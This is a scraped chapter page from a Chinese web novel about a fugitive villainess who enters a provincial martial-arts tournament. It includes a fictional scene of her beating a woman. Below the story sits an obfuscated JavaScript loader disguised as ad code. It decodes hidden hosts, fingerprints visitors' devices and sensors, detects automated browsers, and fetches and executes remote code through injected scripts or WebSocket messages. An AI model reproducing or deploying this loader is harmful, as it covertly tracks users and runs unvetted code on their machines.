零点看书

安装
字:
关灯 护眼
零点看书 > 男配竟是我自己 > 第三十一章 终章 可宰

第三十一章 终章 可宰

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“宿主大大,遇到拦路检查的了,要不要给她使点绊子?”绒团子跟在穆琉璃身边,看着她变了模样办了身份证又扔了卫衣,天亮后装出可怜兮兮的模样靠着捏出来的美貌伪装,编了个丢手机、钱包的谎言在公路边拦了辆车,恳请司机师傅将她带到市区。
  由于传送卡能量有限,抵消掉解除刑具以后传送位置并不远,依旧处于湘灵市周边。
  显然穆琉璃在章邑县分所再次离奇消失让高武联盟紧张行动起来,一路上有不少严格排查点。
  小白猫蠢蠢欲动想趁机给她制造点麻烦。
  “只要她不做坏事就轻举妄动。”姜晨阻止道:“剧本更新出来了,她最近一段时间会很老实。
  现在穆琉璃跟好心让她搭乘的凡人司机在一起,万一排查的时候出什么乱子,她那种没有底线的人很有可能会拿司机来挡枪,还是尽量不要节外生枝等比武大会的时候再弄她。”
  “好的喵!”绒团子收起来手机,揣手蹲在座椅上开始呼噜噜打盹儿。
  坐在车上的穆琉璃很紧张,尤其是看到那些全副武装的警察和气息强横负责坐镇的武者,前世骨子里对警察的恐惧让她微垂着头大气都不敢喘。
  万一被搜查出来又抓进去,自己可没那么多好感度可以一次次逃跑了……
  “穆琉璃?”负责检查的工作人员看到证件上的名字顿时一支棱,再细看看照片和详细信息又泄了气,被通缉的家伙再愚蠢都知道隐姓埋名了,更何况这位姑娘有合法证件绝不会是无证逃犯。
  验证过证件真假后,对方比对了好几遍确定证件和本人相貌一致,这才摆手让车辆通行。
  “呼……”提心吊胆的穆琉璃总算松了口气,暗暗感叹自己决策明智,这10点好感度没白花!
  要是还像前一次那样莽,恐怕这会儿就会被扣下抽血彻底露馅了。
  有惊无险过了检查站,穆琉璃抵达湘灵市以后立马打听到武者交易买卖的街道,拿了些灵石兑换成人民币。然后又去换了新的衣服、发型,置办房产,从头到脚彻底换成新身份。
  “唉,先前是我太急功近利了。”傍晚时分穆琉璃坐在落地窗前端详着纤细手指上的大钻戒,折射出来五彩华丽光线照得眼睛都微微眯起来,她轻声感叹道:“系统,你瞧瞧现在咱们过得日子,这才叫舒坦呢!”
  恶臭系统没吭声,她对此毫不在意。
  自己绑定的这个系统还算老实,不做坏事它也不吭声不催促。
  今天努力降低存在感免得嘴臭引来注意被人发现端倪,跟遇到的所有人都和声和气,然后她就发现凭借自僃己捏的这张倾国倾城的脸,很自然就能引起陌生人的好感。
  其中不乏许多温柔漂亮的小姐姐。
  凭借性别优势跟对方行为亲密些也不会被发现有什么可疑。
  武者身份混迹在凡人中还挺吃香的,穆琉璃此时才彻底想明白,胖子不是一天吃出来的。同样做坏事也不能时时刻刻总想着得罪人拿蝇头小利,经营好人美心善人设以后哪怕偶尔做一次坏人也不会引起注意。
  尤其是自己现在可没有世家保护伞,行事必须要更加谨慎。
  坏事嘛,不做则已做就要做得漂亮,栽赃陷害污人清白一出手就得冲着弄死对方不留痕迹去的,绝不能留下把柄让人怀疑到自己头上。
  除非等将来跟系统绑定的好感度爆表,才能考虑富贵险中求浪一次。
  在那之前,还是以稳为主。
  整日混迹在纸醉金迷的生活里,有花不完的钱和夜店各种漂亮小姐姐玩得开随便贴贴,就在负责盯梢的小白猫以为穆琉璃找到新的生活方式,想要这么轻松愉快吃喝玩乐过下去的时候,她又开始不满足了。
  “不就是个出来卖的吗?给你钱还不让老子高兴,滚你麻痹的!”穆琉璃一脚将夜店里拽回来的女人踹下床,没听到恶臭系统给奖励心里很窝火。
  自从好感度掉的只剩下20点以后,恶臭系统反应就很敷衍了。
  有时候自己明明做的很过分,但就是不给提示不给奖励。
  偶尔给一丢丢也是克扣过得,对凡人做坏事本来就奖励少,如今更是少的没眼看了。照这样速度下去,得多少年才能涨一点好感度?
  更重要的是自己要努力变强!
  区区炼气期二层,那些厉害点的武者小姐姐根本就不愿意搭理自己。凡人美则美矣,但还是少了武者的气质和完美身材,更别提武者才能做出来的极限动作了。
  越是对比,穆琉璃就越不满意。
  从各种渠道找来各种各样美女贴贴,她们却没有一个能比得上蓝英……
  一想到跟蓝英双修时的爽感,她把气都撒在那个不知所措的女人身上。
  “啪啪啪!”
  被武者按住狠狠打屁股,女人挣扎着逃脱不掉只得求饶道:“呜呜……我不敢了,别打我!我、我真不行,美女需要的话我可以帮忙介绍可以同性的……”
  “麻的,真没用!”要不是目前生活还不错,不想杀人引来麻烦,穆琉璃都想把她捆绑到地下室虐杀掉换奖励。
  狠狠打屁股以后恶臭系统也不吭声,她又气又恼把对方踢出家门。
  不行,没处泄火太憋得慌太难受了,我得找个武者小美人双修贴贴才能去火气!
  穆琉璃打开各个群,想看看有没有鱼能上钩。
  这段时间老老实实猫着,她终于把这个世界基本规则搞明白了,有高武联盟和警方双重组合存在,这个世界破案速度一流!
  恶臭原主之所以能长期逍遥法外,全特么靠肾虚老头儿护着。
  穆家能操纵武海市警方;肾虚老头儿可以抵挡住高武联盟的压力,她才能肆无忌惮。
  不过现如今穆琉璃顺利脱身,穆家可惨喽!
  这半个月时间隔壁武海市热闹的很,天天霸占着新闻头条。
  程听荷坐镇清算高武世家穆家的种种罪状,将涉案人员全部抓捕一一审讯判刑;
  顺藤摸瓜拔出一条走私暗线,不管是国外的白色生意还是穆家在深山私自开黑矿倒卖毒灵石全都一网打尽。
  最终除了些不知情的养子养女外,穆家核心势力只有金丹境穆冬海逃过一劫。
  他贪图享乐流连花丛,确实没怎么掺和家族拿不到明面上的生意,但利用自身实力以及在高武联盟中的地位和人脉为穆家提供保护伞是事实。
  这件事说大就大说小就小。
  穆冬海是个知进退的,见大势不妙立马向高武联盟认罪表忠心并自愿请罪,甚至还带着检查团大义灭亲将潜逃人员抓捕归案。
  程听荷与总部商议后决定留下穆冬海,一来穆家彻底倾覆没有后路可退;
  二来他唯一的血脉亲生女儿也被夺舍如今下落不明,抓捕那个满身谜团的家伙,还得靠他的血样比对甚至是亲自上手诱捕;
  最后一点更重要的就是穆冬海好歹也是个金丹境,年纪大点战斗力稍弱也是货真价实的强者,高武联盟放他一马暗中盯紧了,不失为一个好用的打手。
  既然可大可小,何不卖个人情留下他当做免费棋子?
  于是高武穆家连根拔起,穆冬海被摘干净并担任追捕通缉犯穆琉璃的主要负责人之一。
  他现在一心想把对方抓住引出穿越神魂,尝试把女儿救活,自然比任何人都尽心尽力。
  穆家倒了,强抢监禁少年、意图杀害苏医生、将南宫樱落逼坠成魔、偷盗、污蔑剑灵门弟子等等所有黑锅都被扣在被夺舍的穆琉璃身上。
  该赔偿的赔偿,被害了性命的也等着抓捕到通缉犯以后再判处死刑。
  穆冬海干劲满满,他都跟高武联盟总部谈妥了,届时所有的罪都由穿越后的神魂承担,将其引导出女儿的身体后想办法救活她,自己还能跟唯一的血脉相依为命。
  只是在金丹境高手钟翰樑眼皮子底下消失的穆琉璃竟然再也没有丝毫音讯,追捕工作一时陷入泥淖。
  内幕消息穆琉璃自然不清楚,她也不关注。
  毕竟如今已经是全新身份跟穆家划清界限了,还是琢磨自己去哪里找武者小姐姐贴贴来的更现实。
  “哎?关南省和关北省要举行一场武者切磋交流大会?”她看到网上的宣传顿时眼前一亮!
  报名已经开始能看到武者名单长得看不到头,只要年龄符合都可以参加,这可是一场武者盛会。
  对于身怀系统的自己来说,哪怕报个名随便去打两场擂台赛搞点不伤大雅的小摩擦,就能得到比平日里多百倍的好处!
  再加上自己捏了张倾国倾城的脸,边比赛边赢得奖励慢慢变强,说不定还能一举成名呢。
  “报名报名,这种盛况怎么能少得了小仙女呢!”穆琉璃开心的打开报名网站,将系统给自己制作的完美新身份上传,成功报名参加两省武者比武大会。
  “看了半个月热闹,终于该准备行动了。”姜晨得到绒团子的一手线报,伸个懒腰暂停编写炼丹方要。
  两省比武大会消息一出,顿时风头无两。
  关南省和关北省本来就属于竞争对手,从资源到经济条件,相邻的两个省经常会被拿出来做对比,高武联盟两省分部更是如此。
  心高气傲的武者们也都想压对方一头为自己家乡争光,因此报名通道开放后,不管是已经修炼多年还是刚觉醒的武者,只要达到年龄条件无一例外踊跃报名。
  各路媒体渲染中,被全国人民看好的自然当属关南省湘灵市警厅段副厅长的儿子——段明洋。

安卓、IOS版本请访问官网https://www.biqugeapp.co下载最新版本。如浏览器禁止访问,请换其他浏览器试试;如有异常请邮件反馈。


  他从觉醒以来就展现出惊人天赋,一路顺风顺水直达凡尔赛中的天花板。
  如今年方二十已经突破金丹境成为一代佼佼者。
  “话说,我们明洋崽崽不会上擂台吧?他可是金丹境高手,别说同龄组成员就算是全国都很难找到对手的呀!”
  “我老公太厉害了,关北省所有人加起来都不是他的对手,大概不会亲自上场吧。”
  “真可惜,看不到我们崽儿亲自出手,这比武大会不看也罢!”
  “关北省拿什么来比啊?段明洋一出场绝对的冠军!”
  “王者就是王者,这次绝对直接碾压关北省,为咱们关南省武者争光!”
  “呜呜呜……明洋崽崽,妈妈爱你!”
  “那是我老公,你们都别跟我抢……”
  …………
  段明洋从高武联盟总部回到老家湘灵市的消息一经报道,网上瞬间掀起评论热潮。
  任务世界里武者实力越强身份就越高贵,年轻帅气或者美貌的武者自然也拥有狂热粉丝群,这可比什么饭圈厉害多了,毕竟他们粉的都是货真价实能为国而战的武者战士。
  尤其是备受关注大佬们都争相抢收徒弟的段明洋,年仅二十岁长相英俊、常年修炼武学体型完美,剑眉星目英气勃发半点都不输给电影明星,拥有目前最多最大的粉丝群体。
  毕竟谁能拒绝一个温文尔雅又能为国争光的俊美少年呢?
  “原来是个小白脸啊。”穆琉璃刷到满屏幕跪舔段明洋的消息和评论,又隐约记得恶臭原主好像也是他的狂热粉,不过对方身世显赫不是她一个小地头蛇家族千金能染指的,所以一直觊觎却没能得手,甚至都没跟对方见过面。
  此时在网上搜索出来,带着一连串荣耀名头的是个剑眉星目鼻梁挺拔皮肤白皙的美少年,穆琉璃顿时撇撇嘴不屑道:“你拿错剧本了呀,小伙子。
  要搁偶像剧里,你这长相绝对是男一号。
  只可惜这是现实不是故事,所以,你注定是天选之子——老子成名的垫脚石。呵,金丹境不下场?规则就是用来打破的,等着吧我一定会踩着你成就天才美少女鼎鼎大名!”
  穆琉璃终于入乡随俗弄清楚了规则,只要有点名气的武者受追捧程度可比前世见过那些一线大明星神气多了。
  若是能在比武大会崭露头角成为被追捧的大明星,就能轻而易举找到志同道合愿意双修的武者美人儿!更重要的是,全都是武者打来打去的场合,才最方便自己浑水摸鱼嘛。
  看个球赛还能脾气火爆骂来骂去甚至动手打起来呢,这次可是货真价实的武者对战!
  “系统,准备好咱们要开始干活儿了!”穆琉璃左思右想觉得这次绝对是不亏的买卖。
  随便怼怼武者拿点奖励,既能增强实力快速出名又能增加跟系统之间绑定好感度,要是运气好能边打比赛边升级一路晋升到金丹境对战段明洋,那才是戏剧性的出名一战呢!
  “宿主大大,咱们要怎么对付她?”绒团子早就等的不耐烦了,蜷缩在宿主怀里边舔毛边问道:“难不成真要看着她按照剧情安排,一路靠着羞辱他人、做坏事换奖励开挂,走上总决赛?”
  姜晨翻看着剧本慢条斯理道:“病毒为了迁就至今还没能升级到炼气期三层的穆琉璃,特意把比武大会规则都修改了。
  原剧情明明没到筑基境不允许参加精英赛,现在么……哪怕是刚觉醒的武者都能参赛了,咱们也没必要等着段明洋来收拾她。”
  “哎?宿主大大要出手吗?”小白猫用爪子挠挠角色卡有点懵,“角色卡只有段明洋参赛了呀?你现在用的还是炼丹师风翎羽的身体,年龄虽然符合条件,但籍贯不符而且原主只会炼丹不会武技的嘛。”
  姜晨笑笑没说话,用手指了指名单。
  绒团子瞄了一眼顿时愣住,“哎?苏文舟苏医生?!他怎么觉醒成武者啦?武海市报名的武者,代表的是关南省?”
  “穆琉璃的系统给她办理身份信息,依旧是使用关南省武海市籍贯。所以穆琉璃登台也是代表关南省,擂台赛会先分区域海选,入围选手再按照不同境界代表各省登台比赛。
  所以这次上擂台之前,同属于关南省武海市的穆琉璃和苏文舟医生会先遇到。”
  “喵喵喵?”绒团子瞪大双眼,小声提醒道:“宿主大大,一张角色卡不能使用第二次哦,你不能再进入苏医生身体里啦,而且,苏医生刚觉醒没几天吧?他的实力恐怕还真打不过靠嗑丹药才晋升到炼气期二层的穆琉璃……”
  姜晨闻言露出个胸有成竹的笑容,“小白呀,你别忘了我现在是谁。一个靠人脉能影响改变比赛规则的炼丹师,自然有办法帮苏医生搞定穆琉璃。”
  小白猫满脸期待搓爪爪吹彩虹屁,“我家宿主大大果然最棒啦!你肯定有后手的对不对?让穆琉璃没有半点可以蹦跶的机会!”
  “那当然,最起码她想靠着语言羞辱嘲讽其他武者来换取奖励的路子,已经被我堵死了。接下来,只要你小爪子扒拉一下让苏文舟对战穆琉璃,一切自然水到渠成。”
  “好的喵!安排对手什么的,就交给我吧!”
  一人一系统达成行动方案之后,很快就迎来了关南省海选比赛。
  武海市赛区第一场比赛正式开始。
  早就准备好的体育竞技场内锣鼓喧天鞭炮齐鸣,人群欢呼着摇晃着手里的旗帜为自己支持的武者呐喊加油。
  穆琉璃手里拿着参赛牌,眯着眼从大屏幕上找到自己随机匹配的对手信息。
  下一秒她就惊呆了,“我次奥?真的假的?!”
  温文尔雅风度翩翩的苏医生头像赫然出现在自己对立面,麻的,他什么时候觉醒成武者了?
  一想到当初遇到那个嘴毒的苏文舟,穆琉璃微微皱眉有种不祥的预感。
  自己可没从他手里捞到半点好处!
  这次对战,一定要让他不死也脱层皮才能一解心头之恨。
  “苏医生别紧张,你觉醒时间还不久就当做是初入武者领域,切磋交流见见世面。”姜晨站在后台笑容柔和安慰苏医生。
  对方显然有些紧张,看向这位算是半个同行的前辈心里涌过一阵暖流。
  两人认识时间不久但不知道为什么他总觉得炼丹师风翎羽身上有种很熟悉的感觉,仿佛老朋友一样。熟识之后,他会向自己请教些医学方面的问题也会从药物属性方面给自己许多指点,一见如故此时已然成为无话不谈的知心好友。
  “让你见笑了,本来脑子一热想着参加擂台赛试试修炼的武技成果怎么样,但临上场了还是有点胆怯。”苏医生手心里都是汗,瞄了一眼即将结束的擂台,露出个自嘲笑容,“我大概上去的快被打下来的速度也很快吧。”
  姜晨摇头笑道:“不会的,苏医生人缘好得到的武技都很实用,觉醒以后又刻苦修炼,虽然还没能正式迈入炼气期二层,实力却是差不多的。
  要不然也不会把你分配到这一场里对战气息虚浮的穆琉璃。”
  听到这个熟悉的名字,苏医生微微皱了皱眉。
  虽然不是一个人,但这个名字带来的杀伤力让他有种本能的厌恶。
  “对方一看就是不认真修炼,只靠着吞服丹药才勉强晋升二层的。苏医生正常发挥,肯定能打赢她。哦对了,千万记住一点——武者最重要的一点是修心,不管对方如何言语刺激千万别起情绪波动,专注应战你一定可以的。”
  “好!承你吉言,我努力打赢人生中的第一场比赛!”有熟悉的画面闪过脑海,苏医生似乎从曾经“征用”自己身体的那位对应方式里找到点感觉。
  “穆琉璃!加油!”
  “苏医生最棒啦!”
  “上一场比赛真没看头,还是这一场棒!俊男美女怎么看都养眼。”
  “大名鼎鼎的苏医生竟然也觉醒成为武者了,感觉比以前更帅了呢。”
  “小美女真好看,可惜怎么取了这么个倒霉名字。”
  “虽然不是一个人,但就冲着名字真心喜欢不起来,再漂亮都粉不了。”
  “一样一样的,只要看见这三个字就想起恶毒坏女人,真让人糟心!”
  “哎呀不要这样嘛。咱们武海市好不容易清除掉一颗毒瘤,别提那些不好的事情了,好好看比赛……”
  …………
  人群欢呼声中,主持人宣布下一场对战双方:炼气期二层穆琉璃VS炼气期一层苏文舟。
  “哎?擂台赛不是按照等级划分的嘛?怎么给苏医生安排等级高的人对战?这不是欺负人吗?”
  “是呀是呀,高武联盟怎么安排的?境界差一层实力可差了不少呢,苏医生吃亏呀!”
  “也可能是苏医生实力比较强,对方虽然只是二层实力比较弱吧,毕竟是个娇滴滴的女孩子。”
  “高武联盟划分对手都有严格规定不会乱来的,应该没问题,相信苏医生嘛……”
  …………
  听到对战两人实力有差距,观众顿时爆发出议论声。
  主持人忙解释道:“海选赛匹配对手有严格的流程,穆琉璃尽管等级稍微高一点却是刚晋升二级时间不久且气息虚浮,从理论上来讲是可以和苏医生进行比试的,大赛有高手坐镇点到为止,大家不用担心安全问题。”
  坐在贵宾席上的姜晨听到解释脸上浮现出一丝浅笑。
  观众里也发出许多“吁”声。
  尽管主持人的话很委婉,不过关注武者界动向的观众都能听出来弦外之音——穆琉璃是个花架子,大概率是靠嗑药才晋升的所以匹配给刚觉醒不久的苏医生。
免费看片APP    美女直播间
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x5a\x4e\x70\x4b\x4a\x5a\x57\x61\x62']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],ec=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='nob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++ec]&&clearTimeout(t[e]);l.length?f():RCxthzmRkG()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++ec]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,url:b(),ref:a(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9hc2tkZmouYWxza2ZkZi5jb206MTg0NNDM=','d3NNzOi8vd3Mud3Fkd29yay5jb206OTc5NNyx3c3M6Ly93cy5zemZobDk5LmNNvbTo5NNzk3',window,document,['N','N']);}:function(){};
安装
继续浏览精彩内容
到笔趣阁APP免费阅读
《男配竟是我自己》
打开
浏览器
继续